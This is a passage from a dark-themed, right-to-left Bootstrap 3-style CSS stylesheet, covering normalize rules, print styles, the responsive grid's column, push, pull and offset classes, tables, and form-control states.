}
[hidden],
template {
  display: none;
}
html {
  font-family: sans-serif;
  -ms-text-size-adjust: 100%;
  -webkit-text-size-adjust: 100%;
}
body {
  margin: 0;
}
a {
  background: transparent;
}
a:focus {
  outline: thin dotted;
}
a:active,
a:hover {
  outline: 0;
}
h1 {
  font-size: 2em;
  margin: 0.67em 0;
}
abbr[title] {
  border-bottom: 1px dotted;
}
b,
strong {
  font-weight: bold;
}
dfn {
  font-style: italic;
}
hr {
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 0;
}
mark {
  background: #ff0;
  color: #000;
}
code,
kbd,
pre,
samp {
  font-family: monospace, serif;
  font-size: 1em;
}
pre {
  white-space: pre-wrap;
}
q {
  quotes: "\201C" "\201D" "\2018" "\2019";
}
small {
  font-size: 80%;
}
sub,
sup {
  font-size: 75%;
  line-height: 0;
  position: relative;
  vertical-align: baseline;
}
sup {
  top: -0.5em;
}
sub {
  bottom: -0.25em;
}
img {
  border: 0;
}
svg:not(:root) {
  overflow: hidden;
}
figure {
  margin: 0;
}
fieldset {
  border: 1px solid #c0c0c0;
  margin: 0 2px;
  padding: 0.35em 0.625em 0.75em;
}
legend {
  border: 0;
  padding: 0;
}
button,
input,
select,
textarea {
  font-family: inherit;
  font-size: 100%;
  margin: 0;
}
button,
input {
  line-height: normal;
}
button,
select {
  text-transform: none;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
  -webkit-appearance: button;
  cursor: pointer;
}
button[disabled],
html input[disabled] {
  cursor: default;
}
input[type="checkbox"],
input[type="radio"] {
  box-sizing: border-box;
  padding: 0;
}
input[type="search"] {
  -webkit-appearance: textfield;
  -moz-box-sizing: content-box;
  -webkit-box-sizing: content-box;
  box-sizing: content-box;
}
input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
  -webkit-appearance: none;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
  border: 0;
  padding: 0;
}
textarea {
  overflow: auto;
  vertical-align: top;
}
table {
  border-collapse: collapse;
  border-spacing: 0;
}
@media print {
  * {
    text-shadow: none !important;
    color: #000 !important;
    background: transparent !important;
    box-shadow: none !important;
  }
  a,
  a:visited {
    text-decoration: underline;
  }
  a[href]:after {
    content: " (" attr(href) ")";
  }
  abbr[title]:after {
    content: " (" attr(title) ")";
  }
  a[href^="javascript:"]:after,
  a[href^="#"]:after {
    content: "";
  }
  pre,
  blockquote {
    border: 1px solid #999;
    page-break-inside: avoid;
  }
  thead {
    display: table-header-group;
  }
  tr,
  img {
    page-break-inside: avoid;
  }
  img {
    max-width: 100% !important;
  }
  @page  {
    margin: 2cm .5cm;
  }
  p,
  h2,
  h3 {
    orphans: 3;
    widows: 3;
  }
  h2,
  h3 {
    page-break-after: avoid;
  }
  select {
    background: #fff !important;
  }
  .navbar {
    display: none;
  }
  .table td,
  .table th {
    background-color: #fff !important;
  }
  .btn > .caret,
  .dropup > .btn > .caret {
    border-top-color: #000 !important;
  }
  .label {
    border: 1px solid #000;
  }
  .table {
    border-collapse: collapse !important;
  }
  .table-bordered th,
  .table-bordered td {
    border: 1px solid #ddd !important;
  }
}
*,
*:before,
*:after {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
html {
  font-size: 62.5%;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
body {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  line-height: 1.428571429;
  color: #878787;
  background-color: #1f1f1f;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #ffffff;
  text-decoration: none;
}
a:hover,
a:focus {
  color: #d9d9d9;
  text-decoration: underline;
}
a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
img {
  vertical-align: middle;
}
.img-responsive {
  display: block;
  max-width: 100%;
  height: auto;
}
.img-rounded {
  border-radius: 6px;
}
.img-thumbnail {
  padding: 4px;
  line-height: 1.428571429;
  background-color: #1f1f1f;
  border: 1px solid #dddddd;
  border-radius: 4px;
  -webkit-transition: all 0.2s ease-in-out;
  transition: all 0.2s ease-in-out;
  display: inline-block;
  max-width: 100%;
  height: auto;
}
.img-circle {
  border-radius: 50%;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #2d2d2d;
}
.sr-only {
  position: absolute;
  width: 1px;
  height: 1px;
  margin: -1px;
  padding: 0;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  border: 0;
}
code,
kbd,
pre,
samp {
  font-family: Monaco, Menlo, Consolas, "Courier New", monospace;
}
code {
  padding: 2px 4px;
  font-size: 90%;
  color: #c7254e;
  background-color: #f9f2f4;
  white-space: nowrap;
  border-radius: 4px;
}
pre {
  display: block;
  padding: 9.5px;
  margin: 0 0 10px;
  font-size: 13px;
  line-height: 1.428571429;
  word-break: break-all;
  word-wrap: break-word;
  color: #2d2d2d;
  background-color: #f5f5f5;
  border: 1px solid #cccccc;
  border-radius: 4px;
}
pre code {
  padding: 0;
  font-size: inherit;
  color: inherit;
  white-space: pre-wrap;
  background-color: transparent;
  border-radius: 0;
}
.pre-scrollable {
  max-height: 340px;
  overflow-y: scroll;
}
.container {
  margin-left: auto;
  margin-right: auto;
  padding-right: 15px;
  padding-left: 15px;
}
.container:before,
.container:after {
  content: " ";
  display: table;
}
.container:after {
  clear: both;
}
.container:before,
.container:after {
  content: " ";
  display: table;
}
.container:after {
  clear: both;
}
@media (min-width: 768px) {
  .container {
    width: 750px;
  }
}
@media (min-width: 992px) {
  .container {
    width: 970px;
  }
}
@media (min-width: 1200px) {
  .container {
    width: 1170px;
  }
}
.row {
  margin-right: -15px;
  margin-left: -15px;
}
.row:before,
.row:after {
  content: " ";
  display: table;
}
.row:after {
  clear: both;
}
.row:before,
.row:after {
  content: " ";
  display: table;
}
.row:after {
  clear: both;
}
.col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 {
  position: relative;
  min-height: 1px;
  padding-right: 15px;
  padding-left: 15px;
}
.col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 {
  float: right;
}
.col-xs-12 {
  width: 100%;
}
.col-xs-11 {
  width: 91.66666666666666%;
}
.col-xs-10 {
  width: 83.33333333333334%;
}
.col-xs-9 {
  width: 75%;
}
.col-xs-8 {
  width: 66.66666666666666%;
}
.col-xs-7 {
  width: 58.33333333333334%;
}
.col-xs-6 {
  width: 50%;
}
.col-xs-5 {
  width: 41.66666666666667%;
}
.col-xs-4 {
  width: 33.33333333333333%;
}
.col-xs-3 {
  width: 25%;
}
.col-xs-2 {
  width: 16.66666666666666%;
}
.col-xs-1 {
  width: 8.333333333333332%;
}
.col-xs-pull-12 {
  left: 100%;
}
.col-xs-pull-11 {
  left: 91.66666666666666%;
}
.col-xs-pull-10 {
  left: 83.33333333333334%;
}
.col-xs-pull-9 {
  left: 75%;
}
.col-xs-pull-8 {
  left: 66.66666666666666%;
}
.col-xs-pull-7 {
  left: 58.33333333333334%;
}
.col-xs-pull-6 {
  left: 50%;
}
.col-xs-pull-5 {
  left: 41.66666666666667%;
}
.col-xs-pull-4 {
  left: 33.33333333333333%;
}
.col-xs-pull-3 {
  left: 25%;
}
.col-xs-pull-2 {
  left: 16.66666666666666%;
}
.col-xs-pull-1 {
  left: 8.333333333333332%;
}
.col-xs-pull-0 {
  left: 0%;
}
.col-xs-push-12 {
  right: 100%;
}
.col-xs-push-11 {
  right: 91.66666666666666%;
}
.col-xs-push-10 {
  right: 83.33333333333334%;
}
.col-xs-push-9 {
  right: 75%;
}
.col-xs-push-8 {
  right: 66.66666666666666%;
}
.col-xs-push-7 {
  right: 58.33333333333334%;
}
.col-xs-push-6 {
  right: 50%;
}
.col-xs-push-5 {
  right: 41.66666666666667%;
}
.col-xs-push-4 {
  right: 33.33333333333333%;
}
.col-xs-push-3 {
  right: 25%;
}
.col-xs-push-2 {
  right: 16.66666666666666%;
}
.col-xs-push-1 {
  right: 8.333333333333332%;
}
.col-xs-push-0 {
  right: 0%;
}
.col-xs-offset-12 {
  margin-right: 100%;
}
.col-xs-offset-11 {
  margin-right: 91.66666666666666%;
}
.col-xs-offset-10 {
  margin-right: 83.33333333333334%;
}
.col-xs-offset-9 {
  margin-right: 75%;
}
.col-xs-offset-8 {
  margin-right: 66.66666666666666%;
}
.col-xs-offset-7 {
  margin-right: 58.33333333333334%;
}
.col-xs-offset-6 {
  margin-right: 50%;
}
.col-xs-offset-5 {
  margin-right: 41.66666666666667%;
}
.col-xs-offset-4 {
  margin-right: 33.33333333333333%;
}
.col-xs-offset-3 {
  margin-right: 25%;
}
.col-xs-offset-2 {
  margin-right: 16.66666666666666%;
}
.col-xs-offset-1 {
  margin-right: 8.333333333333332%;
}
.col-xs-offset-0 {
  margin-right: 0%;
}
@media (min-width: 768px) {
  .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 {
    float: right;
  }
  .col-sm-12 {
    width: 100%;
  }
  .col-sm-11 {
    width: 91.66666666666666%;
  }
  .col-sm-10 {
    width: 83.33333333333334%;
  }
  .col-sm-9 {
    width: 75%;
  }
  .col-sm-8 {
    width: 66.66666666666666%;
  }
  .col-sm-7 {
    width: 58.33333333333334%;
  }
  .col-sm-6 {
    width: 50%;
  }
  .col-sm-5 {
    width: 41.66666666666667%;
  }
  .col-sm-4 {
    width: 33.33333333333333%;
  }
  .col-sm-3 {
    width: 25%;
  }
  .col-sm-2 {
    width: 16.66666666666666%;
  }
  .col-sm-1 {
    width: 8.333333333333332%;
  }
  .col-sm-pull-12 {
    left: 100%;
  }
  .col-sm-pull-11 {
    left: 91.66666666666666%;
  }
  .col-sm-pull-10 {
    left: 83.33333333333334%;
  }
  .col-sm-pull-9 {
    left: 75%;
  }
  .col-sm-pull-8 {
    left: 66.66666666666666%;
  }
  .col-sm-pull-7 {
    left: 58.33333333333334%;
  }
  .col-sm-pull-6 {
    left: 50%;
  }
  .col-sm-pull-5 {
    left: 41.66666666666667%;
  }
  .col-sm-pull-4 {
    left: 33.33333333333333%;
  }
  .col-sm-pull-3 {
    left: 25%;
  }
  .col-sm-pull-2 {
    left: 16.66666666666666%;
  }
  .col-sm-pull-1 {
    left: 8.333333333333332%;
  }
  .col-sm-pull-0 {
    left: 0%;
  }
  .col-sm-push-12 {
    right: 100%;
  }
  .col-sm-push-11 {
    right: 91.66666666666666%;
  }
  .col-sm-push-10 {
    right: 83.33333333333334%;
  }
  .col-sm-push-9 {
    right: 75%;
  }
  .col-sm-push-8 {
    right: 66.66666666666666%;
  }
  .col-sm-push-7 {
    right: 58.33333333333334%;
  }
  .col-sm-push-6 {
    right: 50%;
  }
  .col-sm-push-5 {
    right: 41.66666666666667%;
  }
  .col-sm-push-4 {
    right: 33.33333333333333%;
  }
  .col-sm-push-3 {
    right: 25%;
  }
  .col-sm-push-2 {
    right: 16.66666666666666%;
  }
  .col-sm-push-1 {
    right: 8.333333333333332%;
  }
  .col-sm-push-0 {
    right: 0%;
  }
  .col-sm-offset-12 {
    margin-right: 100%;
  }
  .col-sm-offset-11 {
    margin-right: 91.66666666666666%;
  }
  .col-sm-offset-10 {
    margin-right: 83.33333333333334%;
  }
  .col-sm-offset-9 {
    margin-right: 75%;
  }
  .col-sm-offset-8 {
    margin-right: 66.66666666666666%;
  }
  .col-sm-offset-7 {
    margin-right: 58.33333333333334%;
  }
  .col-sm-offset-6 {
    margin-right: 50%;
  }
  .col-sm-offset-5 {
    margin-right: 41.66666666666667%;
  }
  .col-sm-offset-4 {
    margin-right: 33.33333333333333%;
  }
  .col-sm-offset-3 {
    margin-right: 25%;
  }
  .col-sm-offset-2 {
    margin-right: 16.66666666666666%;
  }
  .col-sm-offset-1 {
    margin-right: 8.333333333333332%;
  }
  .col-sm-offset-0 {
    margin-right: 0%;
  }
}
@media (min-width: 992px) {
  .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 {
    float: right;
  }
  .col-md-12 {
    width: 100%;
  }
  .col-md-11 {
    width: 91.66666666666666%;
  }
  .col-md-10 {
    width: 83.33333333333334%;
  }
  .col-md-9 {
    width: 75%;
  }
  .col-md-8 {
    width: 66.66666666666666%;
  }
  .col-md-7 {
    width: 58.33333333333334%;
  }
  .col-md-6 {
    width: 50%;
  }
  .col-md-5 {
    width: 41.66666666666667%;
  }
  .col-md-4 {
    width: 33.33333333333333%;
  }
  .col-md-3 {
    width: 25%;
  }
  .col-md-2 {
    width: 16.66666666666666%;
  }
  .col-md-1 {
    width: 8.333333333333332%;
  }
  .col-md-pull-12 {
    left: 100%;
  }
  .col-md-pull-11 {
    left: 91.66666666666666%;
  }
  .col-md-pull-10 {
    left: 83.33333333333334%;
  }
  .col-md-pull-9 {
    left: 75%;
  }
  .col-md-pull-8 {
    left: 66.66666666666666%;
  }
  .col-md-pull-7 {
    left: 58.33333333333334%;
  }
  .col-md-pull-6 {
    left: 50%;
  }
  .col-md-pull-5 {
    left: 41.66666666666667%;
  }
  .col-md-pull-4 {
    left: 33.33333333333333%;
  }
  .col-md-pull-3 {
    left: 25%;
  }
  .col-md-pull-2 {
    left: 16.66666666666666%;
  }
  .col-md-pull-1 {
    left: 8.333333333333332%;
  }
  .col-md-pull-0 {
    left: 0%;
  }
  .col-md-push-12 {
    right: 100%;
  }
  .col-md-push-11 {
    right: 91.66666666666666%;
  }
  .col-md-push-10 {
    right: 83.33333333333334%;
  }
  .col-md-push-9 {
    right: 75%;
  }
  .col-md-push-8 {
    right: 66.66666666666666%;
  }
  .col-md-push-7 {
    right: 58.33333333333334%;
  }
  .col-md-push-6 {
    right: 50%;
  }
  .col-md-push-5 {
    right: 41.66666666666667%;
  }
  .col-md-push-4 {
    right: 33.33333333333333%;
  }
  .col-md-push-3 {
    right: 25%;
  }
  .col-md-push-2 {
    right: 16.66666666666666%;
  }
  .col-md-push-1 {
    right: 8.333333333333332%;
  }
  .col-md-push-0 {
    right: 0%;
  }
  .col-md-offset-12 {
    margin-right: 100%;
  }
  .col-md-offset-11 {
    margin-right: 91.66666666666666%;
  }
  .col-md-offset-10 {
    margin-right: 83.33333333333334%;
  }
  .col-md-offset-9 {
    margin-right: 75%;
  }
  .col-md-offset-8 {
    margin-right: 66.66666666666666%;
  }
  .col-md-offset-7 {
    margin-right: 58.33333333333334%;
  }
  .col-md-offset-6 {
    margin-right: 50%;
  }
  .col-md-offset-5 {
    margin-right: 41.66666666666667%;
  }
  .col-md-offset-4 {
    margin-right: 33.33333333333333%;
  }
  .col-md-offset-3 {
    margin-right: 25%;
  }
  .col-md-offset-2 {
    margin-right: 16.66666666666666%;
  }
  .col-md-offset-1 {
    margin-right: 8.333333333333332%;
  }
  .col-md-offset-0 {
    margin-right: 0%;
  }
}
@media (min-width: 1200px) {
  .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 {
    float: right;
  }
  .col-lg-12 {
    width: 100%;
  }
  .col-lg-11 {
    width: 91.66666666666666%;
  }
  .col-lg-10 {
    width: 83.33333333333334%;
  }
  .col-lg-9 {
    width: 75%;
  }
  .col-lg-8 {
    width: 66.66666666666666%;
  }
  .col-lg-7 {
    width: 58.33333333333334%;
  }
  .col-lg-6 {
    width: 50%;
  }
  .col-lg-5 {
    width: 41.66666666666667%;
  }
  .col-lg-4 {
    width: 33.33333333333333%;
  }
  .col-lg-3 {
    width: 25%;
  }
  .col-lg-2 {
    width: 16.66666666666666%;
  }
  .col-lg-1 {
    width: 8.333333333333332%;
  }
  .col-lg-pull-12 {
    left: 100%;
  }
  .col-lg-pull-11 {
    left: 91.66666666666666%;
  }
  .col-lg-pull-10 {
    left: 83.33333333333334%;
  }
  .col-lg-pull-9 {
    left: 75%;
  }
  .col-lg-pull-8 {
    left: 66.66666666666666%;
  }
  .col-lg-pull-7 {
    left: 58.33333333333334%;
  }
  .col-lg-pull-6 {
    left: 50%;
  }
  .col-lg-pull-5 {
    left: 41.66666666666667%;
  }
  .col-lg-pull-4 {
    left: 33.33333333333333%;
  }
  .col-lg-pull-3 {
    left: 25%;
  }
  .col-lg-pull-2 {
    left: 16.66666666666666%;
  }
  .col-lg-pull-1 {
    left: 8.333333333333332%;
  }
  .col-lg-pull-0 {
    left: 0%;
  }
  .col-lg-push-12 {
    right: 100%;
  }
  .col-lg-push-11 {
    right: 91.66666666666666%;
  }
  .col-lg-push-10 {
    right: 83.33333333333334%;
  }
  .col-lg-push-9 {
    right: 75%;
  }
  .col-lg-push-8 {
    right: 66.66666666666666%;
  }
  .col-lg-push-7 {
    right: 58.33333333333334%;
  }
  .col-lg-push-6 {
    right: 50%;
  }
  .col-lg-push-5 {
    right: 41.66666666666667%;
  }
  .col-lg-push-4 {
    right: 33.33333333333333%;
  }
  .col-lg-push-3 {
    right: 25%;
  }
  .col-lg-push-2 {
    right: 16.66666666666666%;
  }
  .col-lg-push-1 {
    right: 8.333333333333332%;
  }
  .col-lg-push-0 {
    right: 0%;
  }
  .col-lg-offset-12 {
    margin-right: 100%;
  }
  .col-lg-offset-11 {
    margin-right: 91.66666666666666%;
  }
  .col-lg-offset-10 {
    margin-right: 83.33333333333334%;
  }
  .col-lg-offset-9 {
    margin-right: 75%;
  }
  .col-lg-offset-8 {
    margin-right: 66.66666666666666%;
  }
  .col-lg-offset-7 {
    margin-right: 58.33333333333334%;
  }
  .col-lg-offset-6 {
    margin-right: 50%;
  }
  .col-lg-offset-5 {
    margin-right: 41.66666666666667%;
  }
  .col-lg-offset-4 {
    margin-right: 33.33333333333333%;
  }
  .col-lg-offset-3 {
    margin-right: 25%;
  }
  .col-lg-offset-2 {
    margin-right: 16.66666666666666%;
  }
  .col-lg-offset-1 {
    margin-right: 8.333333333333332%;
  }
  .col-lg-offset-0 {
    margin-right: 0%;
  }
}
table {
  max-width: 100%;
  background-color: transparent;
}
th {
  text-align: right;
}
.table {
  width: 100%;
  margin-bottom: 20px;
}
.table > thead > tr > th,
.table > tbody > tr > th,
.table > tfoot > tr > th,
.table > thead > tr > td,
.table > tbody > tr > td,
.table > tfoot > tr > td {
  padding: 8px;
  line-height: 1.428571429;
  vertical-align: top;
  border-top: 1px solid #dddddd;
}
.table > thead > tr > th {
  vertical-align: bottom;
  border-bottom: 2px solid #dddddd;
}
.table > caption + thead > tr:first-child > th,
.table > colgroup + thead > tr:first-child > th,
.table > thead:first-child > tr:first-child > th,
.table > caption + thead > tr:first-child > td,
.table > colgroup + thead > tr:first-child > td,
.table > thead:first-child > tr:first-child > td {
  border-top: 0;
}
.table > tbody + tbody {
  border-top: 2px solid #dddddd;
}
.table .table {
  background-color: #1f1f1f;
}
.table-condensed > thead > tr > th,
.table-condensed > tbody > tr > th,
.table-condensed > tfoot > tr > th,
.table-condensed > thead > tr > td,
.table-condensed > tbody > tr > td,
.table-condensed > tfoot > tr > td {
  padding: 5px;
}
.table-bordered {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > tbody > tr > th,
.table-bordered > tfoot > tr > th,
.table-bordered > thead > tr > td,
.table-bordered > tbody > tr > td,
.table-bordered > tfoot > tr > td {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > thead > tr > td {
  border-bottom-width: 2px;
}
.table-striped > tbody > tr:nth-child(odd) > td,
.table-striped > tbody > tr:nth-child(odd) > th {
  background-color: #f9f9f9;
}
.table-hover > tbody > tr:hover > td,
.table-hover > tbody > tr:hover > th {
  background-color: #f5f5f5;
}
table col[class*="col-"] {
  position: static;
  float: none;
  display: table-column;
}
table td[class*="col-"],
table th[class*="col-"] {
  float: none;
  display: table-cell;
}
.table > thead > tr > .active,
.table > tbody > tr > .active,
.table > tfoot > tr > .active,
.table > thead > .active > td,
.table > tbody > .active > td,
.table > tfoot > .active > td,
.table > thead > .active > th,
.table > tbody > .active > th,
.table > tfoot > .active > th {
  background-color: #f5f5f5;
}
.table-hover > tbody > tr > .active:hover,
.table-hover > tbody > .active:hover > td,
.table-hover > tbody > .active:hover > th {
  background-color: #e8e8e8;
}
.table > thead > tr > .success,
.table > tbody > tr > .success,
.table > tfoot > tr > .success,
.table > thead > .success > td,
.table > tbody > .success > td,
.table > tfoot > .success > td,
.table > thead > .success > th,
.table > tbody > .success > th,
.table > tfoot > .success > th {
  background-color: #dff0d8;
}
.table-hover > tbody > tr > .success:hover,
.table-hover > tbody > .success:hover > td,
.table-hover > tbody > .success:hover > th {
  background-color: #d0e9c6;
}
.table > thead > tr > .danger,
.table > tbody > tr > .danger,
.table > tfoot > tr > .danger,
.table > thead > .danger > td,
.table > tbody > .danger > td,
.table > tfoot > .danger > td,
.table > thead > .danger > th,
.table > tbody > .danger > th,
.table > tfoot > .danger > th {
  background-color: #f2dede;
}
.table-hover > tbody > tr > .danger:hover,
.table-hover > tbody > .danger:hover > td,
.table-hover > tbody > .danger:hover > th {
  background-color: #ebcccc;
}
.table > thead > tr > .warning,
.table > tbody > tr > .warning,
.table > tfoot > tr > .warning,
.table > thead > .warning > td,
.table > tbody > .warning > td,
.table > tfoot > .warning > td,
.table > thead > .warning > th,
.table > tbody > .warning > th,
.table > tfoot > .warning > th {
  background-color: #fcf8e3;
}
.table-hover > tbody > tr > .warning:hover,
.table-hover > tbody > .warning:hover > td,
.table-hover > tbody > .warning:hover > th {
  background-color: #faf2cc;
}
@media (max-width: 767px) {
  .table-responsive {
    width: 100%;
    margin-bottom: 15px;
    overflow-y: hidden;
    overflow-x: scroll;
    -ms-overflow-style: -ms-autohiding-scrollbar;
    border: 1px solid #dddddd;
    -webkit-overflow-scrolling: touch;
  }
  .table-responsive > .table {
    margin-bottom: 0;
  }
  .table-responsive > .table > thead > tr > th,
  .table-responsive > .table > tbody > tr > th,
  .table-responsive > .table > tfoot > tr > th,
  .table-responsive > .table > thead > tr > td,
  .table-responsive > .table > tbody > tr > td,
  .table-responsive > .table > tfoot > tr > td {
    white-space: nowrap;
  }
  .table-responsive > .table-bordered {
    border: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:first-child,
  .table-responsive > .table-bordered > tbody > tr > th:first-child,
  .table-responsive > .table-bordered > tfoot > tr > th:first-child,
  .table-responsive > .table-bordered > thead > tr > td:first-child,
  .table-responsive > .table-bordered > tbody > tr > td:first-child,
  .table-responsive > .table-bordered > tfoot > tr > td:first-child {
    border-right: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:last-child,
  .table-responsive > .table-bordered > tbody > tr > th:last-child,
  .table-responsive > .table-bordered > tfoot > tr > th:last-child,
  .table-responsive > .table-bordered > thead > tr > td:last-child,
  .table-responsive > .table-bordered > tbody > tr > td:last-child,
  .table-responsive > .table-bordered > tfoot > tr > td:last-child {
    border-left: 0;
  }
  .table-responsive > .table-bordered > tbody > tr:last-child > th,
  .table-responsive > .table-bordered > tfoot > tr:last-child > th,
  .table-responsive > .table-bordered > tbody > tr:last-child > td,
  .table-responsive > .table-bordered > tfoot > tr:last-child > td {
    border-bottom: 0;
  }
}
fieldset {
  padding: 0;
  margin: 0;
  border: 0;
}
legend {
  display: block;
  width: 100%;
  padding: 0;
  margin-bottom: 20px;
  font-size: 21px;
  line-height: inherit;
  color: #2d2d2d;
  border: 0;
  border-bottom: 1px solid #e5e5e5;
}
label {
  display: inline-block;
  margin-bottom: 5px;
  font-weight: bold;
}
input[type="search"] {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
input[type="radio"],
input[type="checkbox"] {
  margin: 4px 0 0;
  margin-top: 1px \9;
  

  line-height: normal;
}
input[type="file"] {
  display: block;
}
select[multiple],
select[size] {
  height: auto;
}
select optgroup {
  font-size: inherit;
  font-style: inherit;
  font-family: inherit;
}
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
input[type="number"]::-webkit-outer-spin-button,
input[type="number"]::-webkit-inner-spin-button {
  height: auto;
}
output {
  display: block;
  padding-top: 7px;
  font-size: 14px;
  line-height: 1.428571429;
  color: #4b4b4b;
  vertical-align: middle;
}
.form-control {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.428571429;
  color: #4b4b4b;
  vertical-align: middle;
  background-color: #2d2d2d;
  background-image: none;
  border: 1px solid #1f1f1f;
  border-radius: 4px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control:-moz-placeholder {
  color: #5a5a5a;
}
.form-control::-moz-placeholder {
  color: #5a5a5a;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #5a5a5a;
}
.form-control::-webkit-input-placeholder {
  color: #5a5a5a;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  cursor: not-allowed;
  background-color: #878787;
}
textarea.form-control {
  height: auto;
}
.form-group {
  margin-bottom: 15px;
}
.radio,
.checkbox {
  display: block;
  min-height: 20px;
  margin-top: 10px;
  margin-bottom: 10px;
  padding-right: 20px;
  vertical-align: middle;
}
.radio label,
.checkbox label {
  display: inline;
  margin-bottom: 0;
  font-weight: normal;
  cursor: pointer;
}
.radio input[type="radio"],
.radio-inline input[type="radio"],
.checkbox input[type="checkbox"],
.checkbox-inline input[type="checkbox"] {
  float: right;
  margin-right: -20px;
}
.radio + .radio,
.checkbox + .checkbox {
  margin-top: -5px;
}
.radio-inline,
.checkbox-inline {
  display: inline-block;
  padding-right: 20px;
  margin-bottom: 0;
  vertical-align: middle;
  font-weight: normal;
  cursor: pointer;
}
.radio-inline + .radio-inline,
.checkbox-inline + .checkbox-inline {
  margin-top: 0;
  margin-right: 10px;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
.radio[disabled],
.radio-inline[disabled],
.checkbox[disabled],
.checkbox-inline[disabled],
fieldset[disabled] input[type="radio"],
fieldset[disabled] input[type="checkbox"],
fieldset[disabled] .radio,
fieldset[disabled] .radio-inline,
fieldset[disabled] .checkbox,
fieldset[disabled] .checkbox-inline {
  cursor: not-allowed;
}
.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 3px;
}
select.input-sm {
  height: 30px;
  line-height: 30px;
}
textarea.input-sm {
  height: auto;
}
.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 6px;
}
select.input-lg {
  height: 45px;
  line-height: 45px;
}
textarea.input-lg {
  height: auto;
}
.has-warning .help-block,
.has-warning .control-label,
.has-warning .radio,
.has-warning .checkbox,
.has-warning .radio-inline,
.has-warning .checkbox-inline {
  color: #c09853;
}
.has-warning .form-control {
  border-color: #c09853;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-warning .form-control:focus {
  border-color: #a47e3c;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
}
.has-warning .input-group-addon {
  color: #c09853;
  border-color: #c09853;
  background-color: #fcf8e3;
}
.has-error .help-block,
.has-error .control-label,
.has-error .radio,
.has-error .checkbox,
.has-error .radio-inline,
.has-error .checkbox-inline {
  color: #b94a48;
}
.has-error .form-control {
  border-color: #b94a48;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-error .form-control:focus {
  border-color: #953b39;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
}
.has-error .input-group-addon {
  color: #b94a48;
  border-color: #b94a48;
  background-color: #f2dede;
}
.has-success .help-block,
.has-success .control-label,
.has-success .radio,
.has-success .checkbox,
.has-success .radio-inline,
.has-success .checkbox-inline {
  color: #468847;
}
.has-success .form-control {
